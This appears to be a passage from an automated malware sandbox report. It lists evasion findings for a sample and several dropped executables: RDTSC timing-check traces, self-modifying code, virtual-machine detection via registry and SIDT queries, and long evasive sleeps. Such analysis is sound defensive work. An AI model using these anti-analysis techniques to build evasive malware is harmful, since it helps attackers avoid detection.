Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09F9 second address: 52C09FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C09FE second address: 52C0AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [769B459Ch], 05h 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F988C7CE31Dh 0x00000018 sub cl, FFFFFF86h 0x0000001b jmp 00007F988C7CE321h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F988C7CE320h 0x00000027 jmp 00007F988C7CE325h 0x0000002c popfd 0x0000002d popad 0x0000002e je 00007F98FDE73D52h 0x00000034 pushad 0x00000035 push ecx 0x00000036 pushfd 0x00000037 jmp 00007F988C7CE323h 0x0000003c adc ecx, 3D75801Eh 0x00000042 jmp 00007F988C7CE329h 0x00000047 popfd 0x00000048 pop eax 0x00000049 popad 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0AA0 second address: 52C0AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0AA4 second address: 52C0AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0B50 second address: 52C0B64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0290h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0B64 second address: 52C0B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0B68 second address: 52C0B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bx, ax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0B79 second address: 52C0B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0BAA second address: 52C0BBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 52C0BBA second address: 52C0BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 jmp 00007F988C7CE327h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F988C7CE325h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: B1E59B second address: B1E5CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F988D0B0296h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: B1E5CE second address: B1E5D3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAA528 second address: CAA52C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAA52C second address: CAA54A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Bh 0x00000007 jbe 00007F988C7CE316h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAA54A second address: CAA55D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F988D0B0286h 0x0000000d jp 00007F988D0B0286h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAA55D second address: CAA567 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F988C7CE316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CA96E4 second address: CA96EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F988D0B0286h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CA96EE second address: CA9709 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE327h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CA999D second address: CA99D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0292h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b ja 00007F988D0B029Ch 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CA99D4 second address: CA99DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAD04F second address: CAD064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0291h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAD225 second address: CAD269 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F988C7CE316h 0x00000009 jmp 00007F988C7CE324h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F988C7CE329h 0x00000018 pushad 0x00000019 jbe 00007F988C7CE316h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAD399 second address: CAD39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CAD39D second address: CAD3A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: C8FCD3 second address: C8FCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F988D0B0286h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCBA7E second address: CCBA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F988C7CE316h 0x0000000a popad 0x0000000b jbe 00007F988C7CE318h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCBA91 second address: CCBA9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F988D0B0286h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCBA9E second address: CCBAB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F988C7CE31Dh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC013 second address: CCC02D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0296h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC02D second address: CCC033 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC4A2 second address: CCC4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC88C second address: CCC893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCC9B5 second address: CCC9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCD075 second address: CCD087 instructions: 0x00000000 rdtsc 0x00000002 js 00007F988C7CE31Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCD087 second address: CCD08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCD2EB second address: CCD2EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CCD2EF second address: CCD311 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F988D0B0299h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD2E95 second address: CD2ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE323h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F988C7CE323h 0x00000014 jnc 00007F988C7CE316h 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD2ED2 second address: CD2EFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F988D0B0296h 0x0000000b popad 0x0000000c jmp 00007F988D0B028Ch 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD4E0A second address: CD4E10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD4E10 second address: CD4E21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988D0B028Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD3C10 second address: CD3C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD568A second address: CD569B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Dh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8B2C second address: CD8B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8B32 second address: CD8B75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F988D0B0296h 0x00000008 push edx 0x00000009 pop edx 0x0000000a ja 00007F988D0B0286h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F988D0B0292h 0x00000017 ja 00007F988D0B0286h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8B75 second address: CD8B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE328h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8B91 second address: CD8BA1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F988D0B0286h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BA1 second address: CD8BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BA5 second address: CD8BBB instructions: 0x00000000 rdtsc 0x00000002 ja 00007F988D0B0286h 0x00000008 jo 00007F988D0B0286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BBB second address: CD8BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BBF second address: CD8BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe RDTSC instruction interceptor: First address: CD8BC3 second address: CD8BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 76EB8D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 913A9A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 93DB4D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 928E15 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 76EAC4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 9A2BCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: B1DDF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: CD3DB8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: CFF7D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: B1DDF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Special instruction interceptor: First address: D6F7B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Special instruction interceptor: First address: 101775A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Special instruction interceptor: First address: 1015F7B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Special instruction interceptor: First address: 102BFAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Special instruction interceptor: First address: 10AA8D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CA775A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CA5F7B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: CBBFAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D3A8D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 105EB8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 1203A9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 122DB4D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 1218E15 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 105EAC4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Special instruction interceptor: First address: 1292BCD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 42D9CF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 42DAB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 5D726D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 5D5B39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 5D5760 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 5FB617 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Special instruction interceptor: First address: 42D97E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: A4DDF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: C03DB8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: C2F7D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: A4DDF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Special instruction interceptor: First address: C9F7B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Special instruction interceptor: First address: BF775A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Special instruction interceptor: First address: BF5F7B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Special instruction interceptor: First address: C0BFAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Special instruction interceptor: First address: C8A8D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: E1DDF8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: FD3DB8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: FFF7D8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: E1DDF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Special instruction interceptor: First address: 11E775A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Special instruction interceptor: First address: 11E5F7B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Special instruction interceptor: First address: 11FBFAE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Special instruction interceptor: First address: 106F7B5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Special instruction interceptor: First address: 127A8D8 instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Memory allocated: 5310000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Memory allocated: 54C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Memory allocated: 74C0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Memory allocated: 54D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Memory allocated: 5690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Memory allocated: 7690000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Memory allocated: 48B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Memory allocated: 4C30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Memory allocated: 4A50000 memory reserve | memory write watch
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAD585 rdtsc 3_2_00CAD585
Contains functionality to detect virtual machines (SIDT)
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBDF01 sidt fword ptr [esp-02h] 3_2_00CBDF01
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 473 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 486 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1697 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1951 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1933 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Window / User API: threadDelayed 392
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 6540 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe TID: 504 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4048 Thread sleep count: 473 > 30 Jump to behavior
